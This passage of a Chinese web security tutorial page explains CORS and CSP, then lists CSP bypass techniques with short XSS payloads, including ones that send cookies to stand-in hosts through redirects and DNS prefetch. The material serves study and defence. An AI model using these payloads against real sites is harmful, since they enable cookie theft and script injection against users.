<strong>(1) 请求方法是以下三种方法之一</strong></p> <blockquote><p>HEAD</p> <p>GET</p> <p>POST</p></blockquote> <p><strong>(2) HTTP的头信息不超出以下几种字段：</strong></p> <blockquote><p>Accept</p> <p>Accept-Language</p> <p>Content-Language</p> <p>Last-Event-ID</p> <p>Content-Type：只限于三个值 <code>application/x-www-form-urlencoded</code>、<code>multipart/form-data</code>、<code>text/plain</code></p></blockquote> <p>浏览器发现这次跨源AJAX请求是简单请求，就自动在头信息之中，添加一个Origin字段</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token request-line"><span class="token property">GET</span> /cors HTTP/1.1</span>
<span class="token header-name keyword">Origin:</span> http://api.b.com
<span class="token header-name keyword">Host:</span> api.a.com

Origin字段用来说明，本次请求来自哪个源（协议 + 域名 + 端口）
服务器根据这个值，决定是否同意这次请求
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>简单请求有三个重要的响应头</p> <p><strong>(1) Access-Control-Allow-Origin</strong></p> <p>该字段是必须的,它的值要么是请求时Origin字段的值，要么是一个*，表示接受任意域名的请求</p> <p><strong>(2)Access-Control-Allow-Credentials</strong></p> <p>该字段可选,它的值是一个布尔值，表示是否允许发送Cookie。</p> <p>默认情况下，Cookie不包括在<code>CORS</code>请求之中。</p> <p>设为true，即表示服务器明确许可，Cookie可以包含在请求中，一起发给服务器。</p> <p>这个值也只能设为true，如果服务器不要浏览器发送Cookie，删除该字段即可</p> <p><strong>(3) Access-Control-Expose-Headers</strong></p> <p>该字段可选，<code>CORS</code>请求时，<code>XMLHttpRequest</code>对象的<code>getResponseHeader()</code>方法只能拿到6个基本字段：</p> <p><code>Cache-Control、Content-Language、Content-Type、Expires、Last-Modified、Pragma</code>。</p> <p>如果想拿到其他字段，就必须在Access-Control-Expose-Headers里面指定。</p> <p>例如，<code>getResponseHeader('wintrysec')</code>可以返回<code>wintrysec</code>字段的值</p> <p><strong>响应字段，可请求资源范围</strong></p> <div class="language-http line-numbers-mode"><pre class="language-http"><code>Access-Control-Allow-Origin：*  //表示同意任意跨源请求
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="非简单请求">非简单请求 <a href="#非简单请求" class="header-anchor">#</a></h3> <blockquote><p>即对服务器有特殊要求的请求，比如PUT方法，自定义HTTP-HEAD头部等</p> <p>非简单请求的CORS请求，会在正式通信之前，增加一次HTTP查询请求，称为&quot;预检&quot;请求</p> <p>&quot;预检&quot;请求用OPTIONS方法询问服务器允许的方法</p></blockquote> <p>&quot;预检&quot;请求的头信息包括两个特殊字段。
<strong>(1)Access-Control-Request-Method</strong>
该字段是必须的，用来列出浏览器的CORS请求会用到哪些HTTP方法.
<strong>(2)Access-Control-Request-Headers</strong>
指定浏览器<code>CORS</code>请求会额外发送的<code>http</code>头部信息字段，多个字段用逗号分隔</p> <p>如果浏览器否定了&quot;预检&quot;请求，会返回一个正常的HTTP回应，但是没有任何<code>CORS</code>相关的头信息字段响应</p> <p>服务器响应的其他<code>CORS</code>相关字段如下：</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token header-name keyword">Access-Control-Allow-Methods:</span> GET, POST, PUT		//服务器支持的所有跨域请求的方法
<span class="token header-name keyword">Access-Control-Allow-Headers:</span> X-Custom-Header		//服务器支持的所有头信息字段
<span class="token header-name keyword">Access-Control-Allow-Credentials:</span> true				//表示是否允许发送Cookie
<span class="token header-name keyword">Access-Control-Max-Age:</span> 1728000						//用来指定本次预检请求的有效期，单位为秒
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>一旦服务器通过了&quot;预检&quot;请求，以后每次浏览器正常的<code>CORS</code>请求，就都跟简单请求一样，会有一个Origin头信息字段。</p> <p>服务器的回应，也都会有一个<code>Access-Control-Allow-Origin</code>头信息字段</p> <p><code>Github</code>上的一个POC：https://github.com/trustedsec/cors-poc</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python3 -m http.server --cgi
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="与jsonp的比较">与JSONP的比较 <a href="#与jsonp的比较" class="header-anchor">#</a></h3> <p><code>CORS</code>与<code>JSONP</code>的使用目的相同，但是比<code>JSONP</code>更强大。</p> <p><code>JSONP</code>只支持GET请求，<code>CORS</code>支持所有类型的HTTP请求。</p> <p><code>JSONP</code>的优势在于支持老式浏览器，以及可以向不支持<code>CORS</code>的网站请求数据。</p> <h2 id="csp是什么-如何设置csp">CSP是什么？如何设置CSP？ <a href="#csp是什么-如何设置csp" class="header-anchor">#</a></h2> <p><code>CSP</code>（Content Security Policy）浏览器内容安全策略， 为了缓解部分跨站脚本问题 。</p> <p><code>CSP</code>的实质就是白名单机制，对网站加载或执行的资源进行安全策略的控制。</p> <p><strong>两种方法启用<code>CSP</code></strong></p> <div class="language-c line-numbers-mode"><pre class="language-c"><code><span class="token number">1.</span> 添加HTTP头信息；
Content<span class="token operator">-</span>Security<span class="token operator">-</span>Policy<span class="token operator">:</span> script<span class="token operator">-</span>src <span class="token string">'self'</span><span class="token punctuation">;</span> object<span class="token operator">-</span>src <span class="token string">'none'</span><span class="token punctuation">;</span> style<span class="token operator">-</span>src cdn<span class="token punctuation">.</span>example<span class="token punctuation">.</span>org<span class="token punctuation">;</span> child<span class="token operator">-</span>src https<span class="token operator">:</span>
<span class="token number">2.</span> 使用<span class="token operator">&lt;</span>meta<span class="token operator">&gt;</span>标签
<span class="token operator">&lt;</span>meta http<span class="token operator">-</span>equiv<span class="token operator">=</span><span class="token string">&quot;Content-Security-Policy&quot;</span> content<span class="token operator">=</span><span class="token string">&quot;script-src 'self'; object-src 'none'; style-src cdn.example.org; child-src https:&quot;</span><span class="token operator">&gt;</span>
参数解释

script<span class="token operator">-</span><span class="token function">src</span><span class="token punctuation">(</span>脚本<span class="token punctuation">)</span>：只信任当前域名
object<span class="token operator">-</span><span class="token function">src</span><span class="token punctuation">(</span>标签<span class="token punctuation">)</span>：不信任任何URL，即不加载任何资源
样式表：只信任http<span class="token operator">:</span><span class="token comment">//cdn.example.org</span>
框架（frame）：必须使用HTTPS协议加载
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p><code>CSP</code>各种限制选项参考：<a href="https://www.zhihu.com/question/21979782" target="_blank" rel="noopener noreferrer">知乎回答<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>，<a href="https://www.mi1k7ea.com/2019/02/24/CSP%E7%AD%96%E7%95%A5%E5%8F%8A%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7%E5%B0%8F%E7%BB%93/" target="_blank" rel="noopener noreferrer">CSP基础语法和绕过<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h3 id="绕过csp-1、2、3、5-重点">绕过CSP(1、2、3、5 重点) <a href="#绕过csp-1、2、3、5-重点" class="header-anchor">#</a></h3> <p><strong>1.<code>URL</code>跳转</strong></p> <p>在<code>default-src</code> 'none'的情况下，可以使用meta标签实现跳转</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>meta</span> <span class="token attr-name">http-equiv</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>refresh<span class="token punctuation">&quot;</span></span> <span class="token attr-name">content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>1;url=http://www.xss.com/x.php?c=[cookie]<span class="token punctuation">&quot;</span></span> <span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在允许<code>unsafe-inline</code>的情况下，可以用<code>window.location</code>，或者<code>window.open</code>之类的方法进行跳转绕过</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript">
  window<span class="token punctuation">.</span>location<span class="token operator">=</span><span class="token string">&quot;http://www.xss.com/x.php?c=[cookie]&quot;</span><span class="token punctuation">;</span>
</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>2.<code>link</code>标签预加载</strong></p> <p>在Firefox下，可以将cookie作为子域名，用<code>dns预解析</code>的方式把cookie带出去，查看<code>dns</code>服务器的日志就能得到cookie</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>link</span> <span class="token attr-name">rel</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>dns-prefetch<span class="token punctuation">&quot;</span></span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>//[cookie].xxx.ceye.io<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>3.利用浏览器补全</strong></p> <p>有些网站限制只有某些脚本才能使用，往往会使用script标签的nonce属性，只有nonce一致的脚本才生效</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token header-name keyword">Content-Security-Policy:</span> default-src 'none';script-src 'nonce-abc'

//CSP设置nonce为abc属性的标签
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>那么当脚本插入点为如下的情况时</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span><span class="token punctuation">&gt;</span></span>插入点<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>aa<span class="token punctuation">&quot;</span></span> <span class="token attr-name">nonce</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>abc<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript">document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span><span class="token string">'CSP'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>可以插入</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code>&lt;script src=//14.rs a=&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这样会拼成一个新的script标签，其中的<code>src</code>可以自由设定</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>//14.rs</span> <span class="token attr-name">a</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>&lt;/p&gt;
&lt;script id=<span class="token punctuation">&quot;</span></span><span class="token attr-name">aa&quot;</span> <span class="token attr-name">nonce</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>abc<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>document.write('CSP');<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>4.代码重用</strong></p> <p>假设页面中使用了<code>Jquery-mobile</code>库，并且<code>CSP</code>策略中包含&quot;<code>script-src</code> '<code>unsafe-eval</code>' &quot;或者&quot;<code>script-src</code> 'strict-dynamic'&quot;</p> <p>那么下面的向量就可以绕过<code>CSP</code>：</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">data-role</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>popup</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>&lt;script&gt;alert(1)&lt;/script&gt;<span class="token punctuation">'</span></span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>5.<code>ifrmae</code></strong></p> <p>(1) 如果页面A中有<code>CSP</code>限制，但是页面B中没有，同时A和B同源，那么就可以在A页面中包含B页面来绕过<code>CSP</code>：</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>iframe</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>B<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>iframe</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>(2) 在Chrome下，<code>iframe</code>标签支持<code>csp</code>属性，这有时候可以用来绕过一些防御，</p> <p>例如&quot;http://xxx&quot;页面有个<code>js</code>库会过滤<code>XSS</code>向量，我们就可以使用<code>csp</code>属性来禁掉这个<code>js</code>库</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>iframe</span> <span class="token attr-name">csp</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>script-src <span class="token punctuation">'</span>unsafe-inline<span class="token punctuation">'</span><span class="token punctuation">&quot;</span></span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>http://xxx<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>iframe</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>6.<code>meta</code>标签</strong></p> <p>meta标签有一些不常用的功能有时候有奇效：
meta可以控制缓存（在header没有设置的情况下），有时候可以用来绕过<code>CSP nonce</code></p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>meta</span> <span class="token attr-name">http-equiv</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>cache-control<span class="token punctuation">&quot;</span></span> <span class="token attr-name">content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>public<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>meta可以设置Cookie（Firefox下），可以结合self-xss利用</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>meta</span> <span class="token attr-name">http-equiv</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>Set-Cookie<span class="token punctuation">&quot;</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>cookievalue=xxx;expires=Wednesday,21-Oct-98 16:14:21 GMT; path=/<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/csrf-ssrf.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        请求伪造漏洞
      </a></span> <span class="next"><a href="/knowledge/web/xss.html">
        XSS 跨站脚本漏洞
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/79.c4e9a4f2.js" defer></script>
  </body>
</html>